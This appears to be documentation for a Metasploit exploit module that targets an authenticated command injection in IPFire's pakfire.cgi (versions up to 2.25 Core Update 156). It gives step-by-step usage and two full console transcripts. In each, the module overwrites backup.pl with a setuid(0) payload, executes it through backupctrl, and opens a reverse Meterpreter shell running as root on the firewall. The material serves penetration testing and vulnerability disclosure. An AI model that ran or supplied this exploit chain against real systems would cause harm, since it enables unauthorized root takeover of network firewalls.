MucahitSaratar
6.4 KiB
6.4 KiB
Vulnerable Application
IPFire 2.25 (Core Update 156) IPFire 2.21 (Core Update 126)
This module exploits an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior to execute arbitrary code as the root user.
Verification Steps
- Start msfconsole
- Do:
use exploit/linux/http/ipfire_pakfire_exec - Do:
set username <USERNAME OF THE ADMINISTRATIVE USER TO AUTHENTICATE TO THE WEB PORTAL AS> - Do:
set password <PASSWORD FOR admin USER ON THE WEB PORTAL> - Do:
set rhost <TARGET IP> - Do:
exploit - You should get a shell as the
rootuser.
Options
USERNAME Username of the administrative user you are authenticating to the web portal as.
PASSWORD Password for the administrative user you are authenticating to the web portal as.
Scenarios
IPFire 2.21 (Core Update 126)
msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options
Module options (exploit/linux/http/ipfire_pakfire_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 444 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.22.244.16 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.22.244.50
RHOSTS => 172.22.244.50
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LPORT 9925
LPORT => 9925
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit
[*] Started reverse TCP handler on 172.22.244.16:9925
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.21 (Core Update 126)
[*] Copying backup.pl to a backup file...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with code to setuid(0)
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to execute the payload
[*] Sending stage (39392 bytes) to 172.22.244.50
[*] Meterpreter session 1 opened (172.22.244.16:9925 -> 172.22.244.50:41860) at 2021-06-04 16:48:12 -0500
[*] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : ipfire.localdomain
OS : Linux 4.14.86-ipfire #1 SMP Tue Dec 11 08:36:08 GMT 2018
Architecture : x64
Meterpreter : python/linux
meterpreter >
IPFire 2.25 (Core Update 156)
msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options
Module options (exploit/linux/http/ipfire_pakfire_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 444 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.22.244.16 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.22.244.18
RHOSTS => 172.22.244.18
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit
[*] Started reverse TCP handler on 172.22.244.16:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.25 (Core Update 156)
[*] Copying backup.pl to a backup file...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with code to setuid(0)
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to execute the payload
[*] Sending stage (39392 bytes) to 172.22.244.18
[*] Meterpreter session 1 opened (172.22.244.16:4444 -> 172.22.244.18:33936) at 2021-06-04 16:07:39 -0500
[*] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : ipfire.localdomain
OS : Linux 4.14.212-ipfire #1 SMP Tue May 4 09:02:54 GMT 2021
Architecture : x64
Meterpreter : python/linux
meterpreter >